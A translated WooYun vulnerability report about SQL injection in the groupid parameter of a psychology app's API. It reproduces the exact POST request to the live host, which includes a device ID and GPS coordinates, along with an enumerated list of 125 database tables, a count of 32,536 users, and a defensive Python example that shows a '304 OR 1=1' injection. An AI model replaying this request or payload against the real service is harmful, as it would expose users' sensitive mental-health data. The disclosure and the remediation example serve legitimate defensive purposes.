
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0149534

Vulnerability title: SQL injection in one endpoint of the 心理记 app exposes data of more than 30,000 users

Vendor: 心理记

Author: sauren

Submitted: 2015-10-26 15:07

Fix time: 2015-12-10 15:08

Disclosure time: 2015-12-10 15:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2015-10-26: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2015-12-10: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

The endpoint is as follows:
POST /social/groupinfo HTTP/1.1
Host: api.xinliji.me
Pragma-Token:
Accept-Language: zh-CN
Pragma-Device: 3f065f492417b51bb2b29a20246710fc4144122c
User-Agent: XinLiJiMe/1.5.1 (iPhone; iOS 7.1.1; Scale/2.00)
Accept: */*
Accept-Encoding: gzip, deflate
Pragma-DeviceType: 4
longitude: 120.218978
Pragma-Encoding: gzip
latitude: 30.252254
Content-Type: application/x-www-form-urlencoded
Pragma-OS: MApi 3.0 (qj.ios; AppStore; iPhone; 7.1.1)
Connection: keep-alive
Proxy-Connection: keep-alive
Content-Length: 21
userid: 0
groupid=304&userid=0
The groupid parameter is vulnerable to SQL injection.
Database: xljdb
[125 tables]
+-------------------------------+
| BATCH_JOB_EXECUTION |
| BATCH_JOB_EXECUTION_CONTEXT |
| BATCH_JOB_EXECUTION_PARAMS |
| BATCH_JOB_EXECUTION_SEQ |
| BATCH_JOB_INSTANCE |
| BATCH_JOB_SEQ |
| BATCH_STEP_EXECUTION |
| BATCH_STEP_EXECUTION_CONTEXT |
| BATCH_STEP_EXECUTION_SEQ |
| authassignment |
| authitem |
| authitemchild |
| people |
| tbl_about |
| tbl_action_balance |
| tbl_action_score |
| tbl_action_value |
| tbl_admin |
| tbl_agency |
| tbl_agreement |
| tbl_alipay_transaction |
| tbl_anchor |
| tbl_authassignment |
| tbl_authitem |
| tbl_authitemchild |
| tbl_autofollows |
| tbl_banner |
| tbl_banner_param |
| tbl_blacklist |
| tbl_blocked_device |
| tbl_chat |
| tbl_clinic |
| tbl_code |
| tbl_comment |
| tbl_consultant |
| tbl_consultant_apply |
| tbl_consultant_call |
| tbl_consultant_call_deduction |
| tbl_consultant_comment |
| tbl_consultant_event |
| tbl_consultant_event_item |
| tbl_consultant_label |
| tbl_consultant_online |
| tbl_consultant_order |
| tbl_consultant_order_taken |
| tbl_consultant_reserve |
| tbl_consultant_session |
| tbl_consultant_setting |
| tbl_consultant_state |
| tbl_consultant_term |
| tbl_daily |
| tbl_dream |
| tbl_dream_comment |
| tbl_dream_msg |
| tbl_dream_repo |
| tbl_ency_catg |
| tbl_ency_content |
| tbl_ency_subcatg |
| tbl_event_label |
| tbl_exchange |
| tbl_follow |
| tbl_gift |
| tbl_gift_message |
| tbl_gift_transaction |
| tbl_gift_user |
| tbl_group |
| tbl_group_bak |
| tbl_group_block |
| tbl_group_pending |
| tbl_group_user |
| tbl_group_user_bak |
| tbl_house_rent |
| tbl_iap_receipt |
| tbl_iap_transaction |
| tbl_like |
| tbl_message |
| tbl_mood |
| tbl_mood_result |
| tbl_mood_wall |
| tbl_msg_session |
| tbl_news |
| tbl_news_notification |
| tbl_occupation |
| tbl_photos |
| tbl_place |
| tbl_preference |
| tbl_product |
| tbl_psy_catg |
| tbl_psy_exam |
| tbl_psy_exam_option |
| tbl_psy_exam_question |
| tbl_psy_exam_result |
| tbl_psy_exam_user |
| tbl_qq_index |
| tbl_report |
| tbl_sso_ticket |
| tbl_subject |
| tbl_subject_event |
| tbl_subject_event_item |
| tbl_subject_event_map |
| tbl_subject_follow |
| tbl_suggestion |
| tbl_tag_catg |
| tbl_tag_catg_item |
| tbl_task |
| tbl_user |
| tbl_user_event |
| tbl_user_event_draft |
| tbl_user_event_item |
| tbl_user_event_item_draft |
| tbl_user_gift |
| tbl_user_group_block |
| tbl_user_label |
| tbl_user_mood |
| tbl_user_photo |
| tbl_user_task |
| tbl_vendor |
| tbl_verifycode |
| tbl_version |
| tbl_visit |
| tbl_wechat_index |
| tbl_wechat_pay_notify |
| tbl_wechat_pay_order |
| tbl_weibo_index |
| tbl_word_temp |
+-------------------------------+
125 tables.

Proof of vulnerability:

Database: xljdb
+----------+---------+
| Table | Entries |
+----------+---------+
| tbl_user | 32536 |
+----------+---------+
More than 30,000 users.

Remediation:

Strictly filter the input.
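A defender-side illustration of that fix, added here as an example and not code from the app, the vendor or the report's author: a groupinfo lookup that concatenates groupid into SQL next to a hardened version that validates groupid as a plain integer and binds it as a query parameter. The backend language, schema and column names of the real service are unknown; the in-memory SQLite table and its rows are constructed stand-ins for tbl_group.

```python
import re
import sqlite3

# Constructed sample rows standing in for tbl_group (the real schema is unknown).
SAMPLE_GROUPS = [
    (304, "Evening mindfulness circle"),
    (305, "Private: staff only"),
    (306, "Private: closed pilot"),
]

# Only ASCII decimal digits; str.isdigit() would also accept characters such as
# superscript digits that int() then rejects, so an explicit pattern is safer.
GROUPID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """Build an in-memory database with the constructed tbl_group rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_group (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tbl_group VALUES (?, ?)", SAMPLE_GROUPS)
    return conn


def groupinfo_vulnerable(conn, groupid):
    """The pattern the report points to: the form value becomes part of the SQL text."""
    sql = "SELECT id, name FROM tbl_group WHERE id = " + groupid
    return conn.execute(sql).fetchall()


def is_valid_groupid(groupid):
    """Strict allow-list check: the parameter must be a short decimal integer."""
    return isinstance(groupid, str) and GROUPID_RE.fullmatch(groupid) is not None


def groupinfo_hardened(conn, groupid):
    """Validate first, then bind the value so it can never alter the query structure."""
    if not is_valid_groupid(groupid):
        raise ValueError("groupid must be a decimal integer")
    sql = "SELECT id, name FROM tbl_group WHERE id = ?"
    return conn.execute(sql, (int(groupid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(groupinfo_vulnerable(db, "304"))           # the one intended row
    print(len(groupinfo_vulnerable(db, "304 OR 1=1")))  # every row in the table
    print(groupinfo_hardened(db, "304"))             # the one intended row
    print(is_valid_groupid("304 OR 1=1"))            # False: rejected before any SQL runs
```

Either measure alone helps, but the bound parameter is the one that holds even when a later code change loosens the validation.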

Copyright notice: please credit the source when reposting: sauren@WooYun


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond.